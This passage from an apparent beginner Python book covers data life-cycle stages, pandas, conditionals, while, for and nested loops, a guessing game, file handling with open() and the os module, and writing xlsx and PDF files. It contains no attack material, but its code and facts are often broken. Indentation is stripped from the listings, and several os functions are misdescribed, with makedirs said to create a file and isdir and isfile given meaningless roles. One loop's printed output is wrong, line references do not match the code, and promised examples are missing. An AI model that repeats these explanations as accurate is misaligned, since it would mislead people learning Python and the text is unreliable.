Things if we would like.

The next part is going to be known as Data Maintenance. This is


going to be where you supply the data to points at which data
synthesis and data usage can occur in the next few steps. And it is
best if you are able to work out the points so that they are going to
be ready to go in this kind of phase.

What we will see during the data maintenance is that we are


working to process the data, without really working to derive any
value out of it yet. This is going to include integration changed
data, cleansing, and making sure that the data is in the right format
and as complete as possible before we get started. This ensures that
no matter what method or algorithm you choose to work with here,
you are going to be able to have the data ready to go.

Once you have been able to maintain the data and get it all cleaned
up, it is time to work on the part known as data synthesis. This is a
newer phase in the cycle and there are some places where you may
not see this happen. This is going to be where we create some of
the values of data through inductive logic, and using some of the
data that we have from somewhere else as the input. The data
synthesis is going to be the arena of analytics that is going to use
modeling of some kind to help you get the right results in the end.

Data usage comes next. This data usage is going to be the part of
the process where we are going to apply the data as information to
tasks that the enterprise needs to run and then handle the
management on its own. This would be a task that normally falls
outside of your life cycle for the data. However, data is becoming
such a central part of the model for most businesses and having this
part done can make a big difference.

For example, the data itself can be a service or a product, or at least


part of this service or product. This would then make it a part of the
data usage as well. The usage of the data is going to have some
special challenges when it comes to data governance. One of these
is whether it is legal to use the data in the ways that most people in
business would like. There could be some issues like contractual or
regulatory constraints on how we can use this data and it is
important that these are maintained as much as possible.

Once we have figured out the data usage, it is time to move on to


data publication implying that that has been sent outside of the firm
or enterprise.
Next on the list is the data archival. We will see that the single data
value that we are working with can sometimes experience a lot of
different rounds of usage and then publication, but eventually, it is
going to reach the very end of its life. The first part of this means
that we need to be able to take the value of the data and archive it.
When we work on the process of Data Archival, it is going to mean
that we are copying the data to an environment where it is stored in
case we need it again, in an active production environment, and
then we will remove the data from all of those active environments
as well.

This kind of archive for the data is simply going to be a place


where the data is stored, but where no publication, usage, or
maintenance is going to happen. If necessary, it is possible to take
any of the data that is in the archive and bring it back out to use
again.

And finally, we reach the part of data purging. This is going to be


the end that comes with our single data value and the life cycle that
it has gone through. Data purging is going to be when we remove
every copy of data from the enterprise. If possible, you will reach
this information through the archive. If there is a challenge from
Data Governance at this point, it is just there to prove that the
information and the data have gone through the proper purging
procedure at that time.

2. Working with data analysis and why it is


important

With this in mind, we need to pay attention to why we would want


to work on data analysis to start with? Do we really need to be able
to look through all of this information to find the trends, or is there
another method? Let’s look at an example of what can happen
when we do this data analysis and why you would want to use it.

Let’s consider that we are looking at a set of data that includes


information about the weather that occurred across the globe
between the years 2015 to 2018. We are also going to have
information that is base don the country between these years as
well. So, there is going to be a percentage of ran within that
country and we are going to have some data that concerns this in
our set of data as well.

Now, what if you would like to go through all of that data, but you
would like to only take a look at the data that comes with one
specific country. Let’s say that you would like to look at America
and you want to see what percentage of rain it received between
2016 and 2017. Now, how are you going to get this information in
a quick and efficient manner?
What we would need to do to make sure that we were able to get
ahold of this particular set of data is to work with the data analysis.
There are several algorithms, especially those that come from
machine learning, that would help you to figure out the percentage
of rain that America gets between 2016 to 2017. And this whole
process is going to be known as what data analysis is really all
about.

3. The Python Panda Library

When it comes to doing some data analysis in Python, the best


extension that you can use is Pandas. This is an open-sourced
library that works well with Python and it is going to provide you
with a high level of performance, data structures that are easy for
even a beginner to use, and tools to make data analysis easy with
Python. There are a lot of things to enjoy about this language, and
if you want to be able to sort through all of the great information
that you have available with the help of Python, then this is the
library that you need to work with.

There are a lot of things that you can enjoy when it comes to
working on the Python library. First off, this is one of the most
popular and easy to use libraries when it comes to data science and
it is going to work on top of the NumPy library. The one thing that
a lot of coders are going to like about working with Pandas is that it
is able to take a lot of the data that you need, including a SQL
database or a TSV and CSV file, and will use it to create an object
in Python. This object is going to have columns as well as rows
called the data frame, something that looks very similar to what we
see with a table in statistical software including Excel.
There are many different features that are going to set Pandas apart
from some of the other libraries that are out there. Some of the
benefits that you are going to enjoy the most will include:

1. There are some data frames or data structures that are


going to be high level compared to some of the others
that you can use.
2. There is going to be a streamlined process in place to
handle the tabular data, and then there is also a
functionality that is rich for the time series that you
want to work with.
3. There is going to be the benefit of data alignment,
missing data-friendly statistics, merge, join, and
groupby methods to help you handle the data that you
have.
4. You are able to use the variety of structures for data in
Pandas, and you will be able to freely draw on the
functions that are present in SciPy and NumPy to help
make sure manipulation and other work can be done
the way that you want.

Before we move on from here, we also need to have a good look at


what some of the types of data are when it comes to Pandas.
Pandas is going to be well suited when it comes to a large amount
of data and will be able to help you sort through almost any kind of
data that you would like. Some of the data types that are going to
be the most suitable for working with the Pandas library with
Python will include:

1. Any kind of tabular data that is going to have columns


that are heterogeneously typed.
2. Arbitrary matrix data that has labels for the columns
and rows.
3. Unordered and ordered time-series data
4. Any other kinds of sets of data that are statistical and
observational.

Working with the Pandas library is one of the best ways to handle
some of the Python codings that you want to do with the help of
data analysis. As a company, it is so important to be able to go
through and not just collect data, but also to be able to read through
that information and learn some of the trends and the information
that is available there. being able to do this can provide your
company with some of the insights that it needs to do better, and
really grow while providing customer service.

There are a lot of different methods that you can use when it comes
to performing data analysis. And some of them are going to work
in a different way than we may see with Python or with the Pandas
library. But when it comes to efficiently and quickly working
through a lot of data, and having a multitude of algorithms and
more that can sort through all of this information, working with the
Python Pandas is the best option.
Conditional Statements
If Statements
More often than not, you’re faced with a situation where you have
to decide something and then, a few things happen in response to
your decision.
Similarly, programming languages also allow you to write
conditional tests, with which, you can check a condition and make
responses according to it. Let’s take a real-life example, and then
code it. If the stove is on, then close it. If it is not on, then do
nothing.
If you take a look, we use the keyword ‘if’ when we’re trying to
put forth a condition. If this, then that. Likewise, Python uses the if
statement to allow you to make a decision based on something.
That ‘something’ in our example was, whether or not the stove was
on. Let’s code it.

1. # Whether or not the stove is on.


2. stoveOn = True
3. # Is the stove on?
4. if stoveOn == True:
5. print("The stove is on! Close it.")
Firstly, we declared our variable and said, yes, the stove is on.
Now, using the if statement, we see, if the value of our variable
when compared to the Boolean value, True, yields a True, i.e. the
stove is actually on and both of their values are the same.
Now to the syntactical part. Using if statement is simple. You can
either write your condition after the if keyword or you could wrap
it in a pair of parentheses. Like this:
if(stoveOn == True):
You can put in as many conditions as you want and use logical
operators (and, or) to separate them and make a decision based on
their values. Thirdly, after the condition, we use the “:” symbol to
continue. Next, we tell what should our program do, if, the result of
our conditional test is True. If not, it will completely ignore the
code which follows this test. But, is it going to be the first
following line only? Let’s see.
Since in our case, it is True, we simply print a statement to close it
right away. But, here’s something odd. Do you see an indentation
on the next line?
This indentation is how we recognize the part of the code which
follows our if statement. In this case, there’s only one statement.
But, here’s an example with multiple lines of code and quite a few
conditions to test:

1. # Whether or not the stove is on.


2. stoveOn = True
3. lightsOn = False
4. # Is the light on? Just check the stove.
5. if(lightsOn == True):
6. if(stoveOn == True):
7. print("The lights are on, just close the stove.")
8. # Is the light off? Open it, then, check the stove.
9. if(lightsOn == False):
10. print("First, open the lights!")
11. if(stoveOn == True):
12. print("Close the stove!")
Now, we test a few conditions and then make our decision. We
added another variable which helps us make a decision.
Firstly, check if the lights are on. If their values are correct, I
indented the code in the next line, which means, lines 7-8 are to be
executed only if the statement on line 6 is True.
If not, all that code is neglected. If, however, line 6 yields a True
but line 7 returns a False. You see, I indented the code on line 8
again. Which means, this is now, a part of the if statement on line 7
and will not be executed in this case.
Now, on to the second conditional test. If the lights aren't on, print
a statement to turn the lights on. Then check for the stoves. See,
how the code on line 12-13 is indented once. It means they belong
to the first if statement and will be executed by the interpreter if the
statement on line 11 yields a True.
Similarly, code on line 14 only executes if the if statement on line
13 is True.
So, the indentation in Python is important and must be well
taken care of. If you don’t indent your code properly, either
your conditions won’t output a result, or, you will get an error.
‘If-else’ Statements
Now, what was our example again? Here’s that sentence. If the
stove is on, then close it. If it is not on, then do nothing.
You see, we catered the part where it says, if the stove is on, do this
and that. But, what about the part where it isn’t on? Let’s take a
look at this code. We expand on our first example.

1. # Whether or not the stove is on.


2. stoveOn = False
3.
4. # Is the stove on?
5. if stoveOn == True:
6. print("The stove is on! Close it.")
7. else:
8. print("The stove is off!")
Now, we put a False in our variable and continued our tests. If the
stove is on (True output from the if condition), just print that it is
on. If it is not, we use the else clause, to say, do this instead.
Like our real-life situations. Do this, else do that. So, what happens
here? When the result from the if statement on line 5 is False, it
neglects all indented code (which was to follow if that if statement
was True) and executes the else clause.
Now, logically, it states, If the stoveOn is False, do this. And, we
simply print, that the stove is already off!

‘if-elif-else’ Statements
Usually, when asked to write multiple conditions, you might write
them in a similar fashion: If this, then do this. Else if this, then do
that. Else (none of these), do something completely different.
See, how all these if-elseif-else clauses are linked to one single
conditional statement? This is where the elif or Else If block
comes in. If your variable, the one you wish to use for your
conditional test, has many values, and needs to output differently
for those values, you can put them in an if-elif-else block. This
way, on the first true, no other condition gets executed. Or, elif gets
executed, or the else clause.
We did just the same. We said, If the lights and stove are on, you
just close the stove. Else if (elif in Python), the lights are closed
but the stove is on, turn the lights, close the stove. And further,
continue with the else statement.

1. # Whether or not the stove is on.


2. stoveOn = True
3. lightsOn = False
4. # Is the light on? Just check the stove.
5. if(lightsOn == True and stoveOn == True):
6. print("The lights are on, just close the stove.")
7. elif (lightsOn == False and stoveOn == True):
8. print("Turn the ligts on, close the stove!")
9. else:
10. print("Both the lights and the stove is on.")

The example also shows how you can run multiple conditions in an
if-elif-else statement and base the output on all those.
Loops – The Never-Ending Cycle
Imagine you are creating a program which asks the user to guess a
number. The code should ideally run for three times before it could
let the user know that they consumed their three chances and failed.
Similarly, the program should be smart enough to know if the user
guessed the right number, in which case, it would end the execution
of the program by displaying “You guessed the right number!”
We use loops to address such situations. Loops are when an entire
block of code continues to run over and over again, until the
condition set is no longer valid. If you forget to set a condition, or
if a condition is not properly defined, you may start an endless loop
that will never cease, causing the program to crash completely.
Do not worry, your system will not crash. You can end the program
by using the red/pink stop button that always magically appears
after you hit the green run button.
There are essentially two types of loops we use in Python. The first
one is the ‘while’ loop, and the second one is the ‘for’ loop.
The ‘While’ Loop
This type of loop runs a specific block of code for as long as the
given condition remains true. Once the given condition is no longer
valid, or turns to false, the block of code will end right away.
This is quite a useful feature as there may be codes which you may
need to rely on to process information quickly. To give you an
idea, suppose, you are to guess a number. You have three tries.
You want the prompt to ask the user to guess the number. Once the
user guesses the wrong number, it will reduce the maximum
number of tries from three to two, inform the user that the number
is wrong and then ask to guess another time. This will continue
until either the user guesses the right number or the set number of
guesses are utilized and the user fails to identify the number.
Imagine just how many times you would have to write the code
over and over again. Now, thanks to Python, we just type it once
underneath the ‘while’ loop and the rest is done for us.
Here’s how the syntax for the ‘while’ loop looks like:
while condition:
code
code

You begin by typing in the word ‘while’ followed by the condition.
We then add a colon, just like we did for the ‘if’ statement. This
means, whatever will follow next, it will be indented to show that
the same is working underneath the loop or the statement.
Let us create a simple example from this. We start by creating a
variable. Let’s give this variable a name and a value like so:
x=0
Nothing fun here, so let us add something to make it more exciting.
Now, we will create a condition for a while loop. The condition
would state that as long as x is equal to or less than 10, the prompt
will continue to print the value of x. Here’s how you would do that:
x=0
while x <= 10:
print(x)
Now try and run that to see what happens!
Your console is now bombarded with a never-ending loop of zeros.
Why did that happen? If you look close enough at the code, we
only assigned one value to our variable. There is no code to change
the value or increase it by one or two, or any of that.
In order for us to create a variable that continues to change variable
after it has printed the initial value, we need to add one more line to
the code. Call it as the increment code, where x will increase by
one after printing out a value. The loop will then restart, this time
with a higher value, print that and then add one more. The loop will
continue until x is equal to 10. The second it hits the value of 11,
the interpreter will know that the condition no longer remains true
or valid, and hence we will jump out of the loop.
x=0
while x <= 10:
print(x)
x=x+1
The last line will execute and recall the current value of x, and then
it will add one to the value. The result would look like this.
1
2
3
4
5
6
7
8
9
10
If you do not like things to add just like that, add a little print
statement to say “The End” and that should do the trick.
I almost forgot! If you intend to add a print statement at the end,
make sure you hit the backspace key to delete the indentation first.
Let’s make things a little more fun now, and to do that, we will be
creating our very first basic game.
Let me paint the scenario first. If you like, pick up a pen and a
paper, or just open notepad on your computer. Try and write down
what you think is the possible solution for this.
The game has a secret number that the end-user cannot see. Let’s
assume that the number is set to 19. We will allow the user to have
three attempts to guess the number correctly. The game completes
in a few possible ways:

1. The user guesses the number correctly before running


out of lives.
2. The user runs out of the three chances and is unable to
guess the number.
3. The user guesses the number on the final attempt.
Use your imagination and think what can be the possible code.
Once ready, let us proceed to the actual coding for this game and
see how this works out to be.
Hint: Use both a ‘while’ loop and an ‘if’ statement!
Well done for those who tried. There is no shame in failing to pull
this off. I failed to do the same myself until I saw the solution and I
practically kicked myself!
my_number = 19
guess = 0
max_guess = 3
while guess < max_guess:
number = int(input("Guess the number: "))
guess += 1
if number == my_number:
print("Wow! Look at you, genius!")
break
else:
print("Nope! Not in a million years! Try again!")
else:
print("You ran out of chances")
“Wait! Why did you use an ‘else’ with the ‘while’ loop? I didn’t
know if you can do that!”
Now you do! The ‘else’ is not just limited to ‘if’ statements, you
can use it with while as well.
Here’s what the end result looks like:
All incorrect guesses
Guess the number: 1
Nope! Not in a million years! Try again!
Guess the number: 2
Nope! Not in a million years! Try again!
Guess the number: 3
Nope! Not in a million years! Try again!
You ran out of chances
Correct guess
Guess the number: 17
Nope! Not in a million years! Try again!
Guess the number: 18
Nope! Not in a million years! Try again!
Guess the number: 19
Wow! Look at you, genius!
Remember nested conditional statements? This is exactly that. The
program begins by first understanding certain variables. See how I
have named them to make it a little easier to read.
We gave ‘guess’ a value of zero to begin with. That is exactly what
you need to do as the first attempt has not yet been registered by
the system. Always begin such guesses/attempts from zero and
then add increments. We then followed by setting an upper limit.
We could have just written the same in this way:
while guess <= 3:
The problem with this would have been that the digit ‘3’ was only
recognizable by us. For any other programmer, this would not
make any sense. Therefore, we replaced that with a variable so that
it literally improves readability. Now, it reads like this:
“While guess is less than or equal to three:”
This is how you should always aim your codes to be. They should
be readable and easy to understand by everyone.
“<=” is yet another operator. Here, the values are either less than
or equal to whatever the value of variable is on the other side.
We started by asking the user to guess, and that’s what we need as
an input. However, since it will be a whole number, we also
converted the same into an integer. After the user guessed the
number, whether right or wrong, we immediately need the program
to add a value of ‘1’ to the number of guesses. This is where we
used an increment. But, unlike what we did earlier, I changed a
little and used the ‘+=’ operator. It basically means to increase the
value by whatever the digit you choose to write on the other side. If
you are more comfortable using the previous method, it would
work flawlessly as well.
Now, here’s the twist. We used an ‘if’ statement to let the program
know that if the user guesses the exact number, it should print out a
message that is appropriate for the occasion. Otherwise, the ‘else’
condition will take place, as long as this is not the third and final
guess.
Should the final guess wrong, the count will increase for the
number of guesses and the while statement will no longer be true,
in which case, the ‘else’ part of it will come into play and end the
game.
The thing to notice here is the word ‘break’ that I used within the
code. Go ahead and see what happens when you remove this. If
you guess your numbers wrong, the code will work fine. And, if
you end up inputting the right value, instead of ending the game, it
will still go on until the third attempt is made.
To avoid that from happening, we use the ‘break’ statement to let
the program know what to do if the condition above the break
statement is met.
Now, there is almost nothing left about the ‘while’ loop, let us
move to the ‘for’ loops. Slightly different to what you might
expect, but interesting nonetheless.
The ‘For’ Loop
The ‘while’ loop executes whatever the code block that is written
within multiple times, until the condition is no longer met or
invalid. The ‘for’ loop is designed to “iterate over items of
collections” and right away, that is causing some confusion.
Do not be intimidated by fancy words or technical language, once
you see the loop in action, it will automatically start making sense.
To give it a little clear meaning, let us look at the example below:
for char in "Loops":
print(char)
To create a ‘for’ loop, we begin by using the keyword here. The
word ‘char’ is just a variable we created. Notice how we did not
define this variable before. Whenever we use ‘for’ loops, we create
what are called as loop variables. These exist only within the loop
itself, to carry out the loop and its operations. Here, I used ‘char’ to
represent ‘characters’ since Python does not identify letters as
letters.
What this means is “for every character in the word ‘Loops’”, print
out the characters. Surely enough, if you execute this code, you
will end up with this:
L
o
o
p
s
The system iterates over each of the components and then uses
those according to what the program says. Here, we only asked it to
print characters. It started with ‘L’ and then moved on to ‘o’ and
continued until there were no characters left.
It isn’t necessary that you use a string, you can use what are termed
as lists. These are a collection of values, either strings or numbers,
stored within a list. The lists are represented by a square bracket
‘[]’ and can hold as many items as you like.
Let’s try that and see what happens:
for char in ["I", "Love", "Programming"]:
print(char)
Output:
I
Love
Programming
See how that differed? That is because when we used a single
string, every character was a different object. Here, the list holds
multiple objects, instead of printing them separately, it printed out
whatever the value was within each component of the list.
Here’s one more example, and this one has a new function for us to
dive into. Suppose you wish to print out the numbers from one to
20. Instead of typing the entire numbers, we use a built-in function
called range():
for number in range(20):
print(number)
Here, we pass the higher end of the range as a parameter. Now,
Python will execute this for us and the results will be exactly how
you might imagine:
0
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
See how it printed the numbers to 19 and not 20? That is because
for Python, the first position is always considered as zero. If you
scroll up, you will see that the count started from zero. For now, do
not get bogged down there. We will discuss that when we discuss
about index numbers.
If you wish to set a specific starting point, you can do so by adding
a value, followed by a comma, just before the 20:
for number in range(10, 20):
Now the count will begin from 10 and end at 19. Let’s take that up
a notch. Suppose I want to print out numbers from 10 to 20, and I
want 20 to be printed, but I do not want all the numbers. I want the
program to print out every second number, like 12, 14, 16 and so
on. You can actually do that as this range function comes with what
is termed as a ‘step’ for this function.
for number in range(10, 21, 2):
print(number)
Output:
10
12
14
16
18
20
Now, the program executes, starts with the first number and knows
that it needs to jump two steps and print that number. This will
carry on until the final number, or the last possible number of
iteration, is printed. Notice, in order to print 20, I had to change the
value to 21 within the range.
E-commerce and e-shops use these quite a lot to iterate over the
cart items and deliver you a total price of your potential purchase.
In case you wish to see how that happens, here’s one more example
for a ‘for’ loop.
Scenario: I have five items in my imaginary cart. They are $5, $10,
$15, $20, and $25 in prices, respectively. I want the program to let
me know what my total is. While I can use the calculator myself, or
pause for a few seconds and calculate the price myself, I want a
quicker solution. You, as a programmer, will need to create
something like this:
prices = [5, 10, 15, 20, 25]
total = 0
for item in prices:
total += item
print(f"Your total price is: ${total}")
Output:
Your total price is: $75
Let’s be honest. This was much more fun to do than using a simple
calculator, wasn’t it? Programming can be tough at times,
frustrating too. Sometimes, you might arrive at a point where you
would spend the rest of your day, wondering what could possibly
be causing you to have such a nightmarish time with a program that
seemed too simple to execute.
Relax! Every one of us faces that. It comes with the kind of work
we do. Programming can be quite deceptive and will take quite a
lot of time for you to master. What’s important is that you never
give up. Should you feel frustrated, grab a drink, have some fresh
air, and calm your mind. The solution would be more obvious than
you might think.
Now that we have calmed down a little. Let’s get back to learning
Python. It is time to put an end to the loops by learning one more
type of loop called ‘nested’ loop. If you recall, we have already
seen a nested conditional statement; an ‘if’ statement within an ‘if’
statement. Similarly, we use a ‘for’ loop within a ‘for’ loop to get
things that we wish to acquire.
The ‘Nested’ Loop
Let us start this one off by trying to type in some values for ‘a,’ ‘b,’
and ‘c’ We wish to have values from zero to two for each one is
somewhat a similar fashion like we type coordinates:
(a, b, c)
(0, 0, 0)
(0, 0, 1)
And so it goes on until ‘c’ is two, after which the counter is (1, 0,
0) and starts again. That would be quite a lot of work if we were to
write these on our own. Fortunately, we have Python to help us out
by using nested loops. How? Let’s take a look.
for a in range(3):
for b in range(3):
for c in range(3):
print(f"({a}, {b}, {c})")
Wow! Look at that! A ‘for’ loop within a ‘for’ loop within another
‘for’ loop. That is a lot of loops right there. But, that is exactly how
this will work. What happens now is that the program initiates with
the first position of our loop variable ‘c’ while the remaining
variables hold a value of zero. Then, the loop starts again; this time,
only ‘c’ jumps to a value of one while others remain the same. This
will continue right until ‘c’ reaches the end of the range, after
which ‘b’ will gain value of one. Hopefully, you see how this is
going. The result is as under:
(0, 0, 0)
(0, 0, 1)
(0, 0, 2)
(0, 1, 0)
(0, 1, 1)
(0, 1, 2)
(0, 2, 0)
(0, 2, 1)
(0, 2, 2)
(1, 0, 0)
(1, 0, 1)
(1, 0, 2)
(1, 1, 0)
(1, 1, 1)
(1, 1, 2)
(1, 2, 0)
(1, 2, 1)
(1, 2, 2)
(2, 0, 0)
(2, 0, 1)
(2, 0, 2)
(2, 1, 0)
(2, 1, 1)
(2, 1, 2)
(2, 2, 0)
(2, 2, 1)
(2, 2, 2)
Phew! That would have taken us quite some time to write.
However, some clever trickery of nested loops and just a few
keystrokes later, we have it right now we want it. That is how
effective nested loops are. When you are to deal with big chunks of
data, you will want to rely quite a bit on nested loops. These get the
job done and are mighty effective too.
Now, since that is out of the way, let us focus on operators. Those
pesky little signs that keep on changing every now and then
remember? We will be looking into these to see how they work for
us.
File handling
The Python programming language allows us to work on two
different levels when we refer to file systems and directories. One
of them is through the module os, which facilitates us to work with
the whole system of files and directories, at the level of the
operating system itself.
The second level is the one that allows us to work with files, this is
done by manipulating their reading and writing at the application
level, and treating each file as an object.
In python as well as in any other language, the files are
manipulated in three steps, first they are opened, then they are
operated on or edited and finally they are closed.
What is a file?
A python file is a set of bytes, which are composed of a structure,
and within this we find in the header, where all the data of the file
is handled such as, for example, the name, size and type of file we
are working with; the data is part of the body of the file, where the
written content is handled by the editor and finally the end of the
file, where we notify the code through this sentence that we reach
the end of the file. In this way, we can describe the structure of a
file.
The structure of the files is composed in the following way:
- File header: These are the data that the file will contain
(name, size, type)
- File Data: This will be the body of the file and will have
some content written by the programmer.
- End of file: This sentence is the one that will indicate that
the file has reached its end.
Our file will look like this:
How can I access a file?
There are two very basic ways to access a file, one is to use it as a
text file, where you proceed line by line, the other is to treat it as a
binary file, where you proceed byte by byte.
Now, to assign a variable a file type value, we will need to use the
function open (), which will allow us to open a file.
Open() function
To open a file in Python, we have to use the open() function, since
this will receive the name of the file and the way in which the file
will be opened as parameters. If the file opening mode is not
entered, it will open in the default way in a read-only file.
We must keep in mind that the operations to open the files are
limited because it is not possible to read a file that was opened only
for writing, you cannot write to a file which has been opened only
for reading.
The open () function consists of two parameters:
- It is the path to the file we want to open.
- It is the mode in which we can open it.
Its syntax is as follows:
Of which the parameters:
File: This is an argument that provides the name of the file we want
to access with the open() function, this is what will be the path of
our file.
The argument file is considered a fundamental argument, since it is
the main one (allowing us to open the file), unlike the rest of the
arguments which can be optional and have values that are already
predetermined.
Mode: The access modes are those that are in charge of defining
the way in which the file is going to be opened (it could be for
reading, writing, editing).
There are a variety of access modes, these are:
r This is the default open mode. Opens the file for reading
only
r+ This mode opens the file for its reading and writing
rb This mode opens the file for reading only in a binary
format
w This mode opens the file for writing only. In case the file
does not exist, this mode creates it
w+ This is similar to the w mode, but this allows the file to
be read
wb This mode is similar to the w mode, but this opens the
file in a binary format
wb+ This mode is similar to the wb mode, but this allows the
file to be read
a This mode opens a file to be added. The file starts writing
from the end
ab This is similar to mode a, but opens the file in a binary
format
a+ This mode is pretty much like the mode a, but allows us
to read the file.

In summary, we have three letters, or three main modes: r,w and a.


And two submodes, + and b.
In Python, there are two types of files: Text files and plain files. It
is very important to specify in which format the file will be opened
to avoid any error in our code.
Read a file:
There are three ways to read a file:
1. read([n])
2. readlines()
3. readline([n])
Surely at this point, we have the question of what is meant by the
letter n enclosed in parentheses and square brackets? It's very
simple, the letter n is going to notify the bytes that the file is going
to read and interpret.
Read method ([ ])

There we could see that inside the read() there is a number 9, which
will tell Python that he has to read only the first nine letters of the
file
Readline(n) Method
The readline method is the one that reads a line from the file, so
that the read bytes can be returned in the form of a string. The
readline method is not able to read more than one line of code,
even if the byte n exceeds the line quantity.
Its syntax is very similar to the syntax of the read() method.

Readlines(n) Method
The readlines method is the one that reads all the lines of the file,
so that the read bytes can be taken up again in the form of a string.
Unlike the readline method, this one is able to read all the lines.
Like the read() method and readline() its syntax are very similar:

Once we have opened a file, there are many types of information


(attributes) we could get to know more about our files. These
attributes are:
File.name: This is an attribute that will return the name of the file.
File.mode: This is an attribute that will return the accesses with
which we have opened a file.
file.closed: This is an attribute that will return a "True" if the file
we were working with is closed and if the file we were working
with is still open, it will return a "False".
Close() function
The close function is the method by which any type of information
that has been written in the memory of our program is eliminated,
in order to proceed to close the file. But that is not the only way to
close a file; we can also do it when we reassign an object from one
file to another file.
The syntax of the close function is as follows:

What's a buffer?
We can define the buffer as a file which is given a temporary use in
the ram memory; this will contain a fragment of data that composes
the sequence of files in our operating system. We use buffers very
often when we work with a file which we do not know the storage
size.
It is important to keep in mind that, if the size of the file were to
exceed the ram memory that our equipment has, its processing unit
will not be able to execute the program and work correctly.
What is the size of a buffer for? The size of a buffer is the one that
will indicate the available storage space while we use the file.
Through the function: io.DEFAULT_BUFFER_SIZE the program
will show us the size of our file in the platform in a predetermined
way.
We can observe this in a clearer way:
Errors
In our files, we are going to find a string (of the optional type)
which is going to specify the way in which we could handle the
coding errors in our program.
Errors can only be used in txt mode files.
These are the following:
Ignore_errors() This will avoid the comments
with a wrong or unknown
format
Strict_errors() This is going to generate a
subclass or UnicodeError in
case that any mistake or fail
comes out in our code file

Encoding
The string encoding is frequently used when we work with data
storage and this is nothing more than the representation of the
encoding of characters, whose system is based on bits and bytes as
a representation of the same character.
This is expressed as follows:
Newline
The Newline mode is the one that is going to control the
functionalities of the new lines, which can be '\r', " ", none, '\n', and
'\r\n'.
The newlines are universal and can be seen as a way of interpreting
the text sequences of our code.
1.The end-of-line sentence in Windows: "\r\n".
2.The end-of-line sentence in Max Os: "\r".
3.The end-of-line sentence in UNIX: "\n"
On input: If the newline is of the None type, the universal newline
mode is automatically activated.
Input lines can end in "\r", "\n" or "\r\n" and are automatically
translated to "\n" before being returned by our program. If their
respective legal parameters when coding are met, the entry of the
lines will end only by the same given string and their final line will
not be translated at the time of return.
On output: If the newline is of the None type, any type of character
"\n" that has been written, will be translated to a line separator
which we call "os.linesep".
If the newline is of the type " " no type of translator is going to be
made, and in case the newline meets any value of which are
considered the legal for the code, they will be automatically
translated to the string.
Example of newline reading for " ".

Example of newline reading for none:


Manage files through the "os" module
The "os" module allows us to perform certain operations, these will
depend on an operating system (actions such as starting a process,
listing files in a folder, end process and others).
There are a variety of methods with the "os" module which allow
us to manage files, these are:
os.makedirs() This method of the “os” module will
create a new file
os.path.getsize() This method of the “os” module will
show the size of a file in bytes.
os.remove(file_name) This method of the “os” module will
delete a file or the program
os.getcwd () This method of the “os” module will
show us the actual directory from
where we will be working
os.listdir() This method of the “os” module will
list all the content of any folder of
our file
os.rename (current_new) This method of the “os” module will
rename a file
os.path.isdir() This method of the “os” module will
transfer the parameters of the
program to a folder
os.chdir() This method of the “os” module will
change or update the direction of any
folder or directory
os.path.isfile() This method of the “os” module will
transform a parameter into a file.

Xlsx files: xlsx files are those files in which you work with
spreadsheets, how is this? Well, this is nothing more than working
with programs like Excel. For example, if we have the windows
operating system on our computer, we have the advantage that
when working with this type of files, the weight of it will be much
lighter than other types of files.
The xlsx type files are very useful when working with databases,
statistics, calculations, numerical type data, graphics and even
certain types of basic automation.
In this chapter we are going to learn to work the basic
functionalities of this type of files, this includes creating files,
opening files and modifying files.
To start this, first we will have to install the necessary library; we
do this by executing the command "pip3 install openpyxl" in our
Python terminal.
Once executed this command it is going to download and install the
openpyxl module in our Python files, we can also look for
documentation to get the necessary information about this module.
Create an xlsx file: To create a file with this module, let's use the
openpyxl() Workbook() function.
This is the first step that we will do to manage the files of the type
xlsx, we can see that first we have created the file importing the
function Workbook of the module openpyxl; followed by this to
the variable wb we have assigned the function Workbook() with
this we declare that this will be the document with which we are
going to work (we create the object in the form of a worksheet in
this format). Once this is done, we activate the object whose name
is wb in order to assign it a name and finally save the file.
Add information to the file with this module: In order to add
information to our file, we will need to use another type of
functions that come included with the object, one of them is the
append function.

We can observe that this is similar to the last example that we


needed to create a document, for it we did the usual steps: we
created in the function xlsxdoc() the object wb, we activated the
object and there we added the information. In this new space we
will need to know the specific position in which we are going to
write, in this case, we will write in the fourth box of the second row
"B4" and these will be matched with a string that says "goodnight".
The final steps are exactly the same as the last example, therefore,
we will place the name and save it with the save command.
There is a simpler way to write and enter data, we can do this
through the function append()

We can observe that we have created the document "test.xlsx" with


the steps that we explained previously, we can observe that we
have created a tuple called messages, this tuple has three items that
are:
"Hello", "goodmorning", "goodnight".
Once the tuple is created, we use the append function, which will
allow us to attach all the information contained in the tuple
messages and finally save the document with the save function.
The append() function only admits iterable data, what does this
mean? This refers to the data of type arrangements, tuples since, if
they are not entered in this way, our program will return an error.
Read documents in xlsx
Let's go back to our first example to get information from xlsx
files, we could see that, for this, we imported the load_workbook
class. The first thing we need to know is the name of the file we
want to open and for this, we created the variable with the name.
It is important that the files are located in the same folder in which
the program is stored, because otherwise the program will throw us
an error. Inside the function xlsdoc() we will create the object wb
that will be with which we are going to work, followed by this the
object "sheet" is created which is going to represent the sheet that
we are going to use.
Once all this is done, we are going to request the information of the
specific boxes "C1", "C2", "C3" next to the function value, to
validate that the information that we acquire is real, we print all the
information requested.
Handling PDF files
It is known that the initials of this type of file are: "Portable
Document Format", which have grown significantly over the years,
are mostly used in business and education. This is due to the fact
that they provide a great amount of benefits in which its security is
highlighted, allowing to add access keys to control who can edit the
document and even add a watermark to it to avoid plagiarism of
information.
Other outstanding data is that these documents can be seen from
any device since it is not necessary to have a specific program; in
addition, the weight of the files is much lower since these texts are
compressed, unlike Word documents.
A disadvantage of PDF files could be that they are not easy to edit
once they have been created.
In this chapter, we will only learn how to create PDF files.
To create a PDF file the first thing we will have to do is to
download the library through the command "Pip3 install fpdf",
followed by this we can proceed to create our document:

This is a simple level example, but at the same time, it is much


more difficult than other types of files. To start a document you
need a lot of commands, for it we will import the FPDF class from
the fpdf library, followed by this we create the pdfdoc object and
this will be the pdf document. Once created this document, we will
have to customize the formats, size, and style of the letters we are
going to use. To do this we use the command set_font.
In this case, the type of Font that we are going to use is going to be
Times New Roman, with bold style and a size of 12.
Followed by this we will add a page through the command
add_page(), since we will need a page on which to write and the
function fpdf does not create a blank page by default. Then, we're
going to insert information with the cell() function which contains
a set of very important arguments.
The cell function will contain the width and height that the cell will
occupy, it must include the message that will be written in string
format, in case it is required that the edges to come with some
detail included we must add 1 since the 0 is by default and does not
allow anything to be inserted.
If you want to add a cell below or located to the right, you place a 0
and otherwise is placed 1, if you want the text to be centered to the
